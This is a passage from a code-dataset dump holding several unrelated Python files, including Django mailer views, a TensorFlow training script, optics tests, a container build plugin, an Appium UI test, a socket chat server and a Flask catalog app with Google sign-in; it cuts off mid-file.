group_form.save(commit=False)\n new_group.user = request.user\n new_group.save()\n\n return redirect(groups)\n\n return render(request, 'mailer/groups_create.html',\n {'group_form': group_form})\n\n\n@login_required(login_url='sing-in')\ndef update_group(request, group_id):\n group_form = GroupForm(instance=Group.objects.get(id=group_id))\n\n group = Group.objects.get(id=group_id)\n if group.user != request.user:\n raise Http404\n\n if request.method == 'POST':\n group_form = GroupForm(request.POST, instance=group)\n if group_form.is_valid():\n group_form.save()\n\n return redirect(groups)\n\n return render(request, 'mailer/groups_update.html',\n {'group_form': group_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_group(request, group_id):\n Group.objects.get(id=group_id).delete()\n return redirect(groups)\n\n\n@login_required(login_url='sing-in')\ndef contacts(request, group_id):\n contact_list = Contact.objects.filter(group=group_id)\n return render(request, 'mailer/contacts.html',\n {'contact_list': contact_list,\n 'group_id': group_id})\n\n\n@login_required(login_url='sing-in')\ndef create_contact(request, group_id):\n contact_form = ContactForm\n\n if request.method == 'POST':\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n new_contact = contact_form.save(commit=False)\n new_contact.group = Group.objects.get(id=group_id)\n new_contact.save()\n\n return redirect(contacts, group_id=group_id)\n\n return render(request, 'mailer/contact_create.html',\n {'contact_form': contact_form})\n\n\n@login_required(login_url='sing-in')\ndef update_contact(request, contact_id):\n contact_form = ContactForm(instance=Contact.objects.get(id=contact_id))\n\n if request.method == 'POST':\n contact_form = ContactForm(request.POST, instance=Contact.objects.get(id=contact_id))\n if contact_form.is_valid():\n contact = contact_form.save()\n group_id = contact.group.id\n return redirect(contacts, group_id=group_id)\n\n return render(request, 'mailer/contact_update.html',\n {'contact_form': contact_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_contact(request, contact_id):\n contact = Contact.objects.get(id=contact_id)\n group_id = contact.group.id\n contact.delete()\n return redirect(contacts, group_id=group_id)\n\n\n@login_required(login_url='sing-in')\ndef letters(request):\n user = request.user\n letter_list = user.letter_set.all()\n return render(request, 'mailer/letters.html',\n {'letter_list': letter_list})\n\n\n@login_required(login_url='sing-in')\ndef create_letter(request):\n letter_form = LetterForm\n\n if request.method == 'POST':\n letter_form = LetterForm(request.POST)\n if letter_form.is_valid():\n new_letter = letter_form.save(commit=False)\n new_letter.user = request.user\n new_letter.save()\n\n return redirect(letters)\n\n return render(request, 'mailer/letter_create.html',\n {'letter_form': letter_form})\n\n\n@login_required(login_url='sing-in')\ndef update_letter(request, letter_id):\n letter_form = LetterForm(instance=Letter.objects.get(id=letter_id))\n\n if request.method == 'POST':\n letter_form = LetterForm(request.POST, instance=Letter.objects.get(id=letter_id))\n if letter_form.is_valid():\n letter_form.save()\n\n return redirect(letters)\n\n return render(request, 'mailer/letter_update.html',\n {'letter_form': letter_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_letter(request, letter_id):\n Letter.objects.get(id=letter_id).delete()\n return redirect(letters)\n\n\n@login_required(login_url='sing-in')\ndef campaign(request):\n user = request.user\n campaign_list = user.campaign_set.all()\n return render(request, 'mailer/campaign.html',\n {'campaign_list': campaign_list})\n\n\n@login_required(login_url='sing-in')\ndef create_campaign(request):\n campaign_form = CampaignForm\n\n if request.method == 'POST':\n campaign_form = CampaignForm(request.POST)\n if campaign_form.is_valid():\n new_campaign = campaign_form.save(commit=False)\n new_campaign.user = request.user\n new_campaign.save()\n\n return redirect(campaign)\n\n return render(request, 'mailer/campaign_create.html',\n {'campaign_form': campaign_form})\n\n\n@login_required(login_url='sing-in')\ndef update_campaign(request, campaign_id):\n campaign_form = CampaignForm(instance=Campaign.objects.get(id=campaign_id))\n\n if request.method == 'POST':\n campaign_form = CampaignForm(request.POST, instance=Campaign.objects.get(id=campaign_id))\n if campaign_form.is_valid():\n campaign_form.save()\n\n return redirect(campaign)\n\n return render(request, 'mailer/campaign_update.html',\n {'campaign_form': campaign_form})\n\n\n@login_required(login_url='sing-in')\ndef delete_campaign(request, campaign_id):\n Campaign.objects.get(id=campaign_id).delete()\n return redirect(campaign)\n\n\n@login_required(login_url='sing-in')\ndef review_campaign(request, campaign_id):\n campaign = Campaign.objects.get(id=campaign_id)\n return render(request, 'mailer/campaign_review.html',\n {'contacts': campaign.group.contact_set.all(),\n 'letter': campaign.letter,\n 'campaign': campaign})\n\n\n@login_required(login_url='sing-in')\ndef send_campaign(request, campaign_id):\n this_campaign = Campaign.objects.get(id=campaign_id)\n letter = this_campaign.letter.body\n email_list = this_campaign.group.contact_set.values_list('email', flat=True)\n\n html_content = letter\n text_content = strip_tags(letter)\n msg = EmailMultiAlternatives('test', text_content, 'me@me.me', email_list)\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n return redirect(campaign)\n\n","sub_path":"mailer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200966430","text":"import numpy as np\nimport os\n\nimport tensorflow as tf\nfrom random import shuffle\n\nfrom tensorflow.keras.optimizers import Adam\n\nimport datetime\nimport LibFMP.B\nfrom utils_DL import autoTrain, weightedBinaryCrossentropy\nimport random\nfrom customModels import musicalCNN_Jo_lastConv_maxPool_LN_deepResNet\n\n\n########### MODEL ######################################################\nmodel = musicalCNN_Jo_lastConv_maxPool_LN_deepResNet(B=3, \n C=5, \n L=75, \n numOctaves=6, \n numFilters=[20,20,10,1], \n size_filt1=(15,15), \n size2_filt2=3, stride2_filt2=3, \n dropout=0.2,\n alpha=0.3)\nmodel.summary()\n\nopt = Adam(learning_rate=0.0001)\n\nmodel.compile(optimizer=opt, loss='binary_crossentropy', \n metrics=['accuracy','binary_accuracy','binary_crossentropy','cosine_similarity','Precision','Recall'], \n run_eagerly=False)\n\nmodelName = datetime.datetime.now().strftime(format = \"%Y-%m-%d_%H-%M-%S\") + 'mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore'\n###################################################################################\nnumValFiles = 100\n\nmusicNetFolder = '../../../Datasets/MusicNet_tuning_50_snips'\nmusicNetFiles = [f for f in os.listdir(os.path.join(musicNetFolder, 'Chroma')) if '.npy' in f]\nshuffle(musicNetFiles)\nmusicNetTrainFiles = musicNetFiles[numValFiles:]\nmusicNetValFiles = musicNetFiles[:numValFiles]\n\nbeethovenFolder = '../../../Datasets/BeethovenPiano_tuning_50_snips'\nbeethovenFiles = [f for f in os.listdir(os.path.join(beethovenFolder, 'Chroma')) if '.npy' in f]\nshuffle(beethovenFiles)\nbeethovenTrainFiles = beethovenFiles[numValFiles:]\nbeethovenValFiles = beethovenFiles[:numValFiles]\n\nwagnerFolder = '../../../Datasets/WagnerRing_PianoScore_tuning_50_snips'\nwagnerFiles = [f for f in os.listdir(os.path.join(wagnerFolder, 'Chroma')) if '.npy' in f]\nshuffle(wagnerFiles)\nwagnerTrainFiles = wagnerFiles[numValFiles:]\nwagnerValFiles = wagnerFiles[:numValFiles]\n\n\ntrainData = {'files': [musicNetTrainFiles, beethovenTrainFiles, wagnerTrainFiles],\n 'pathHCQT': [os.path.join(musicNetFolder, 'HCQT'),\n os.path.join(beethovenFolder, 'HCQT'),\n os.path.join(wagnerFolder, 'HCQT')],\n 'pathChroma': [os.path.join(musicNetFolder, 'Chroma'),\n os.path.join(beethovenFolder, 'Chroma'),\n os.path.join(wagnerFolder, 'Chroma')]}\n\nvalData = {'files': [musicNetValFiles, beethovenValFiles, wagnerValFiles],\n 'pathHCQT': [os.path.join(musicNetFolder, 'HCQT'),\n os.path.join(beethovenFolder, 'HCQT'),\n os.path.join(wagnerFolder, 'HCQT')],\n 'pathChroma': [os.path.join(musicNetFolder, 'Chroma'),\n os.path.join(beethovenFolder, 'Chroma'),\n os.path.join(wagnerFolder, 'Chroma')]}\n\n\n##################################################################################\n\nautoTrain(model, modelName, trainData, valData, max_epochs=200, steps_per_epoch=4000, batchSize_train=25, batchSize_val=50, lr_decay=0.2, lr_min=1e-6, lr_patience=3, earlyStopping_patience=8, criterion='val_loss', criterion_mode='min', log=True)\n","sub_path":"TrainScripts/trainScript_mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore.py","file_name":"trainScript_mCNN_DEEP-ResNet_trainMusicNet-BeethovenPiano-WagnerPianoScore.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114587602","text":"from django.urls import path\nfrom social_analysis import views\n\n\napp_name = 'social_analysis'\nurlpatterns = [\n path('', views.index, name='index'),\n path('', views.calculate, name='calculate'),\n path('all', views.calculate, name='calculate_all'),\n path('show_all', views.show_all_aggregate, name='show_all'),\n path('remaining', views.calculate_remaining, name='calculate_remaining'),\n path('/', views.calculate_by_period, name='calculate_by_time'),\n]\n","sub_path":"social_analysis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25641998","text":"\nimport numpy as np\n\nfrom .. import poppy_core\nfrom .. import optics\nfrom .. import zernike\nfrom .. import wfe\n\nNWAVES = 0.5\nWAVELENGTH = 1e-6\nRADIUS = 1.0\nNPIX = 101\nDIAM = 3.0\n\ndef test_ZernikeAberration():\n # verify that we can reproduce the same behavior as ThinLens\n # using ZernikeAberration\n pupil = optics.CircularAperture(radius=RADIUS)\n lens = optics.ThinLens(nwaves=NWAVES, reference_wavelength=WAVELENGTH, radius=RADIUS)\n tl_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=WAVELENGTH)\n tl_wave *= pupil\n tl_wave *= lens\n\n zern_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=WAVELENGTH)\n # need a negative sign in the following b/c of different sign conventions for\n # zernikes vs \"positive\" and \"negative\" lenses.\n zernike_lens = wfe.ZernikeWFE(\n coefficients=[0, 0, 0, -NWAVES * WAVELENGTH / (2 * np.sqrt(3))],\n radius=RADIUS\n )\n zern_wave *= pupil\n zern_wave *= zernike_lens\n\n stddev = np.std(zern_wave.phase - tl_wave.phase)\n\n assert stddev < 1e-16, (\"ZernikeAberration disagrees with ThinLens! stddev {}\".format(stddev))\n\ndef test_wavefront_or_meters_decorator():\n zernike_lens = wfe.ZernikeWFE(\n coefficients=[0, 0, 0, NWAVES * WAVELENGTH / (2 * np.sqrt(3))],\n radius=RADIUS\n )\n opd_waves_a = zernike_lens.get_opd(WAVELENGTH)\n opd_waves_b = zernike_lens.get_opd(poppy_core.Wavefront(wavelength=WAVELENGTH))\n\n stddev = np.std(opd_waves_a - opd_waves_b)\n assert stddev < 1e-16, \"OPD map disagreement based on form of argument to get_opd!\"\n\ndef test_zernike_get_opd():\n zernike_optic = wfe.ZernikeWFE(coefficients=[NWAVES * WAVELENGTH,], radius=RADIUS)\n opd_map = zernike_optic.get_opd(WAVELENGTH, units='meters')\n assert np.max(opd_map) == NWAVES * WAVELENGTH\n\n opd_map_waves = zernike_optic.get_opd(WAVELENGTH, units='waves')\n assert np.max(opd_map_waves) == NWAVES\n\ndef test_ParameterizedAberration():\n # verify that we can reproduce the same behavior as ZernikeAberration\n # using ParameterizedAberration\n NWAVES = 0.5\n WAVELENGTH = 1e-6\n RADIUS = 1.0\n\n pupil = optics.CircularAperture(radius=RADIUS)\n\n zern_wave = poppy_core.Wavefront(npix=NPIX, diam=DIAM, wavelength=1e-6)\n zernike_wfe = wfe.ZernikeWFE(\n coefficients=[0, 0, 2e-7, NWAVES * WAVELENGTH / (2 * np.sqrt(3)), 0, 3e-8],\n radius=RADIUS\n )\n zern_wave *= pupil\n zern_wave *= zernike_wfe\n\n parameterized_distortion = wfe.ParameterizedWFE(\n coefficients=[0, 0, 2e-7, NWAVES * WAVELENGTH / (2 * np.sqrt(3)), 0, 3e-8],\n basis_factory=zernike.zernike_basis,\n radius=RADIUS\n )\n\n pd_wave = poppy_core.Wavefront(npix=NPIX, diam=3.0, wavelength=1e-6)\n pd_wave *= pupil\n pd_wave *= parameterized_distortion\n\n np.testing.assert_allclose(pd_wave.phase, zern_wave.phase,\n err_msg=\"ParameterizedAberration disagrees with ZernikeAberration\")\n","sub_path":"poppy/tests/test_wfe.py","file_name":"test_wfe.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"47083358","text":"################################################################################\n# Code\n################################################################################\n\nfrom string import uppercase, lowercase\n\ndef create_codex():\n lowerpairs = zip(lowercase, lowercase[13:] + lowercase[:13])\n upperpairs = zip(uppercase, uppercase[13:] + uppercase[:13])\n code_dict = dict(lowerpairs + upperpairs)\n return (lambda char: code_dict.get(char, char))\n\ndef rot13(message):\n codex = create_codex()\n return ''.join(map(codex, message))\n\n################################################################################\n# Tests\n################################################################################\nfrom codecs import encode\nimport random\n\nsolution = lambda s: encode(s, 'rot13')\n\ndef verify(s):\n assert rot13(s) == solution(s)\n assert rot13(rot13(s)) == s\n\nverify(\"test\")\nverify(\"Test\")\nverify(\"Avoid success at all costs!\")\nverify(\"abcdefghijklmnopqrstuvwxyz\")\nprint(\"OK\")\n","sub_path":"rot13/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197339584","text":"\"\"\"\nCopyright (c) 2019 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\nimport os\nimport subprocess\nimport tempfile\n\nfrom atomic_reactor.build import BuildResult\nfrom atomic_reactor.constants import (PLUGIN_SOURCE_CONTAINER_KEY, EXPORTED_SQUASHED_IMAGE_NAME,\n IMAGE_TYPE_DOCKER_ARCHIVE, PLUGIN_FETCH_SOURCES_KEY)\nfrom atomic_reactor.plugin import BuildStepPlugin\nfrom atomic_reactor.util import get_exported_image_metadata\n\n\nclass SourceContainerPlugin(BuildStepPlugin):\n \"\"\"\n Build source container image using\n https://github.com/containers/BuildSourceImage\n \"\"\"\n\n key = PLUGIN_SOURCE_CONTAINER_KEY\n\n def export_image(self, image_output_dir):\n output_path = os.path.join(tempfile.mkdtemp(), EXPORTED_SQUASHED_IMAGE_NAME)\n\n cmd = ['skopeo', 'copy']\n source_img = 'oci:{}'.format(image_output_dir)\n dest_img = 'docker-archive:{}'.format(output_path)\n cmd += [source_img, dest_img]\n\n self.log.info(\"Calling: %s\", ' '.join(cmd))\n try:\n subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"failed to save docker-archive :\\n%s\", e.output)\n raise\n\n img_metadata = get_exported_image_metadata(output_path, IMAGE_TYPE_DOCKER_ARCHIVE)\n self.workflow.exported_image_sequence.append(img_metadata)\n\n def run(self):\n \"\"\"Build image inside current environment.\n\n Returns:\n BuildResult\n \"\"\"\n fetch_sources_result = self.workflow.prebuild_results.get(PLUGIN_FETCH_SOURCES_KEY, {})\n source_data_dir = fetch_sources_result.get('image_sources_dir')\n remote_source_data_dir = fetch_sources_result.get('remote_sources_dir')\n\n source_exists = source_data_dir and os.path.isdir(source_data_dir)\n remote_source_exists = remote_source_data_dir and os.path.isdir(remote_source_data_dir)\n\n if not source_exists and not remote_source_exists:\n err_msg = \"No SRPMs directory '{}' available\".format(source_data_dir)\n err_msg += \"\\nNo Remote source directory '{}' available\".format(remote_source_data_dir)\n self.log.error(err_msg)\n return BuildResult(logs=err_msg, fail_reason=err_msg)\n\n if source_exists and not os.listdir(source_data_dir):\n self.log.warning(\"SRPMs directory '%s' is empty\", source_data_dir)\n if remote_source_exists and not os.listdir(remote_source_data_dir):\n self.log.warning(\"Remote source directory '%s' is empty\", remote_source_data_dir)\n\n image_output_dir = tempfile.mkdtemp()\n cmd = ['bsi', '-d']\n drivers = []\n\n if source_exists:\n drivers.append('sourcedriver_rpm_dir')\n cmd.append('-s')\n cmd.append('{}'.format(source_data_dir))\n\n if remote_source_exists:\n drivers.append('sourcedriver_extra_src_dir')\n cmd.append('-e')\n cmd.append('{}'.format(remote_source_data_dir))\n\n driver_str = ','.join(drivers)\n cmd.insert(2, driver_str)\n cmd.append('-o')\n cmd.append('{}'.format(image_output_dir))\n\n try:\n output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n self.log.error(\"BSI failed with output:\\n%s\", e.output)\n return BuildResult(logs=e.output, fail_reason='BSI utility failed build source image')\n\n self.log.debug(\"Build log:\\n%s\\n\", output)\n\n self.export_image(image_output_dir)\n\n return BuildResult(\n logs=output,\n oci_image_path=image_output_dir,\n skip_layer_squash=True\n )\n","sub_path":"atomic_reactor/plugins/build_source_container.py","file_name":"build_source_container.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294189410","text":"# -*- coding:utf-8 -*-\n# import re\n# sys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nimport testcase.huajiao_behavior as huajiao_behavior\nimport logging\n\nlogger = logging.getLogger('autolog')\n\n\nclass HuaJiaoTest(unittest.TestCase):\n\n def setUp(self):\n # 在当前目录,新建mail.txt,文件第一行存放设备列表,第二行存放roomid\n with open('mail.txt', 'r') as f:\n info = f.readlines()\n devicelist = info[0].rstrip().split(',')\n logger.info(f'devicelist: {devicelist}')\n self.device_name = devicelist\n self.roomid = info[1].split('#')[0].rstrip()\n self.sd = pubfuc.StartDriver(devicelist)\n self.proc_list = []\n\n pubfuc.cleannodeproc()\n for i in range(len(self.sd.devicelist)):\n self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n for pro in self.proc_list:\n pro.start()\n\n for pro in self.proc_list:\n pro.join()\n\n while len(self.sd.getnodeprocpid()) < len(devicelist):\n sleep(1)\n\n logger.info(self.sd.getnodeprocpid())\n\n self.driverlist = []\n\n for i in range(len(self.sd.devicelist)):\n logger.info(i)\n desire_caps = self.sd.realdevice[i]\n if 'bundleId' in desire_caps:\n desire_caps['bundleId'] = 'com.huajiao.seeding' # bootstrapA50\n # desire_caps['waitForQuiescence'] = 'false'\n else:\n desire_caps['appPackage'] = 'com.huajiao.seeding'\n desire_caps['appActivity'] = 'com.huajiao.seeding'\n driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", self.sd.realdevice[i])\n sleep(10)\n self.driverlist.append(driver)\n\n logger.info(self.driverlist)\n\n def test_001开始直播(self):\n logger.info('test_001开始直播')\n procs = []\n pool = multiprocessing.Pool(processes=len(self.driverlist))\n for driver in self.driverlist:\n index = self.driverlist.index(driver)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"tab logo\"]').click()\n sleep(3)\n # logger.info(driver.page_source)\n # driver.find_element_by_xpath('//XCUIElementTypeImage[@name=\"tab_live\"]').click()\n driver.find_element_by_xpath('//XCUIElementTypeStaticText[@name=\"立即 直播\"]').click()\n sleep(5)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"开始直播\"]').click()\n sleep(10)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"live button close\"]').click()\n sleep(1)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"确定\"]').click()\n sleep(2)\n driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"video close\"]').click()\n sleep(10)\n # //XCUIElementTypeImage[@name=\"tab_live\"] #81 151\n # //XCUIElementTypeButton[@name=\"icon gd zbj\"]\n # //XCUIElementTypeImage[@name=\"icon_lm_gd\"] 连麦\n # //XCUIElementTypeStaticText[ @ name = \"立即 直播\"]\n # //XCUIElementTypeButton[@name=\"开始直播\"]\n # //XCUIElementTypeButton[@name=\"live button close\"] # location\n # //XCUIElementTypeButton[@name=\"确定\"]\n # //XCUIElementTypeButton[@name=\"video close\"]\n # //XCUIElementTypeButton[@name=\"live button music\"]\n # //XCUIElementTypeButton[@name=\"live icon line normal\"] # location\n # driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"tab me normal\"]').click()\n # driver.find_element_by_xpath('//XCUIElementTypeButton[@name=\"geren shezhi\"]').click()\n # //XCUIElementTypeStaticText[@name=\"关于花椒\"]\n # //XCUIElementTypeStaticText[@name=\"上传日志\"]\n # //XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell[1]/XCUIElementTypeOther[2]\n # //XCUIElementTypeStaticText[@name=\"上传完成\"]\n # //XCUIElementTypeButton[@name=\"好的\"]\n # //XCUIElementTypeButton[@name=\"titlebar back normal\"] # 返回按钮\n # driver.find_element_by_id('tab logo').click()\n # proc = pool.apply_async(huajiao_behavior.login, (driver, self.device_name[index], ))\n # procs.append(proc)\n for i in procs:\n i.get()\n for i in procs:\n i.wait()\n\n def tearDown(self):\n logger.info('test运行完成')\n # quite the device driver\n pass\n # for driver in self.driverlist:\n # driver.quit()\n\n\n\n","sub_path":"testcase/huajiao_testcase.py","file_name":"huajiao_testcase.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"95937109","text":"import socket, threading\n\nAddressList = []\nClientList = []\nUsernameList = []\n\ndef start():\n print(\"SERVER HAS STARTED\")\n global AddressList, ClientList, UsernameList\n\n ServerCommandThread = threading.Thread(target = Server_Commands)\n ServerCommandThread.start()\n\n while True:\n client, address = s.accept()\n cUsername = client.recv(1024).decode()\n\n thread = threading.Thread(target = Handle_Users, args = (client, address, cUsername))\n thread.start()\n AddressList.append(address)\n ClientList.append(client)\n UsernameList.append(cUsername)\n\n for x in ClientList:\n ServerMessage = \"[SERVER] New user connected --> \" + cUsername\n x.send(ServerMessage.encode())\n\ndef Handle_Users(client, address, chat_username):\n print(\"Connected to {}\".format(address))\n print(\"Total amount of users connected: {}\".format(threading.active_count() - 2))\n msg = \"\"\n DisconnectMessage = \"!disconnect\"\n\n while True:\n msg = client.recv(1024)\n msg = msg.decode()\n\n if msg != DisconnectMessage: \n msg = chat_username + \": \" + msg \n print(msg)\n\n for x in ClientList:\n if x == client:\n pass\n else:\n x.send(msg.encode())\n \n else:\n\n ClientList.remove(client)\n AddressList.remove(address)\n UsernameList.remove(chat_username)\n client.close()\n break\n\n\ndef Server_Commands():\n ServerSwitch = True\n\n while ServerSwitch:\n Server_Request = input()\n if Server_Request == \"/userlist\":\n print(\"[{}]USERNAME LIST:\".format(threading.active_count() - 2))\n for x in UsernameList:\n print(x)\n elif Server_Request == \"/addrlist\":\n print(\"CONNECION ADDRESS LIST:\")\n for x in AddressList:\n print(x)\n\n\n\n\nif __name__ == \"__main__\":\n\n HEADER = 10\n PORT = 5050\n SERVERIP = '192.168.1.7'\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((SERVERIP, PORT))\n s.listen()\n start()\n\n","sub_path":"SimpleServer.py","file_name":"SimpleServer.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257863203","text":"from keras import activations\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.utils.framework import try_import_tf\n\n_, tf, tfv = try_import_tf()\n\nclass HerdingModel(TFModelV2):\n\n def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n super(HerdingModel, self).__init__(obs_space, action_space, num_outputs, model_config, name)\n\n self.inputs = tf.keras.layers.Input(shape=obs_space.shape, name=\"observations\")\n x = tf.keras.layers.MaxPooling1D(pool_size=2)(self.inputs)\n x = tf.keras.layers.Conv1D(filters=16, kernel_size=4, strides=2)(x)\n x = tf.keras.layers.MaxPooling1D(pool_size=2)(x)\n x = tf.keras.layers.Flatten()(x)\n x = tf.keras.layers.Dense(units=70)(x)\n x = tf.keras.layers.Dense(units=30)(x)\n layer_out = tf.keras.layers.Dense(units=num_outputs, name='action')(x)\n\n value_out = tf.keras.layers.Dense(units=1)(x)\n self.base_model = tf.keras.Model(self.inputs, [layer_out, value_out])\n\n self.register_variables(self.base_model.variables)\n\n def forward(self, input_dict, state, seq_lens):\n model_out, self._value_out = self.base_model(tf.cast(input_dict[\"obs\"], tf.float32))\n\n return model_out, state\n\n def value_function(self):\n return tf.reshape(self._value_out, [-1])\n","sub_path":"rl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378552612","text":"from flask import Flask\nfrom flask import render_template, request, make_response\nfrom flask import redirect, url_for, jsonify\nfrom flask import session as login_session\nfrom sqlalchemy import desc\n\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\n\nfrom database import db_session, init_db\nfrom models import Category, Item\n\nimport random\nimport string\nimport httplib2\nimport json\nimport requests\n\n# get the client id from google api\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read()\n )['web']['client_id']\n\napp = Flask(__name__)\napp.secret_key = 'super-secret-fsnd-key'\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n\n@app.route('/')\ndef index():\n # display the categories list and the most recent items\n categories = Category.query.all()\n latest_items = Item.query.order_by(desc(Item.created_on)).limit(10).all()\n is_logged_in = 'username' in login_session\n return render_template('index.html',\n categories=categories,\n latest_items=latest_items,\n is_logged_in=is_logged_in)\n\n\n@app.route('/catalog.json')\ndef catalog_json():\n # return a json of the categories and it's items\n categories_data = []\n categories = Category.query.all()\n\n for category in categories:\n items = Item.query.filter_by(category_id=category.id).all()\n items_data = []\n\n for item in items:\n items_data.append(item.serialize)\n\n category_data = category.serialize\n category_data['items'] = items_data\n categories_data.append(category_data)\n\n return jsonify(categories_data)\n\n\n@app.route('/login')\ndef login():\n # generate a token for the session\n state = ''.join(\n random.choice(string.ascii_uppercase + string.digits) for x in xrange(32)\n )\n login_session['state'] = state\n return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n # validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # obtain authorization code\n code = request.data\n try:\n # upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # check that the access token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # abort if there was an error\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # verify that the access token is used for the intended user\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_credentials = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # store the access token in the session for later use\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # get user info\n userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n return redirect(url_for('index'))\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n access_token = login_session.get('access_token')\n # check if the user was not logged in\n if access_token is None:\n response = make_response(\n json.dumps('Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # try to disconnect\n url = ('https://accounts.google.com/o/oauth2/revoke?token=%s'\n % access_token)\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n\n return redirect(url_for('index'))\n else:\n response = make_response(\n json.dumps('Failed to revoke token for given user.'), 400)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\n@app.route('/catalog//items')\ndef show_category(category_name):\n # display all the items for the given category\n categories = Category.query.all()\n category = Category.query.filter_by(name=category_name).first()\n items = Item.query.filter_by(category_id=category.id).all()\n return render_template('category.html',\n categories=categories,\n category=category,\n items=items,\n qty_items=len(items))\n\n\n@app.route('/.json')\ndef category_json(category_name):\n # return a json of all the items of the selected category\n category = Category.query.filter_by(name=category_name).first()\n items = Item.query.filter_by(category_id=category.id).all()\n\n items_data = []\n for item in items:\n items_data.append(item.serialize)\n\n return jsonify({\n 'id': category.id,\n 'name': category.name,\n 'items': items_data\n })\n\n\n@app.route('/catalog//')\ndef show_item(category_name, item_name):\n # display the item information of the given item\n category = Category.query.filter_by(name=category_name).first()\n item = Item.query.filter(\n (Item.category_id == category.id) & (Item.name == item_name)).first()\n is_logged_in = 'username' in login_session\n return render_template('item.html',\n item=item,\n is_logged_in=is_logged_in)\n\n\n@app.route('//.json')\ndef item_json(category_name, item_name):\n # return a json with the details of the selected item\n category = Category.query.filter_by(name=category_name).first()\n item = Item.query.filter(\n (Item.category_id == 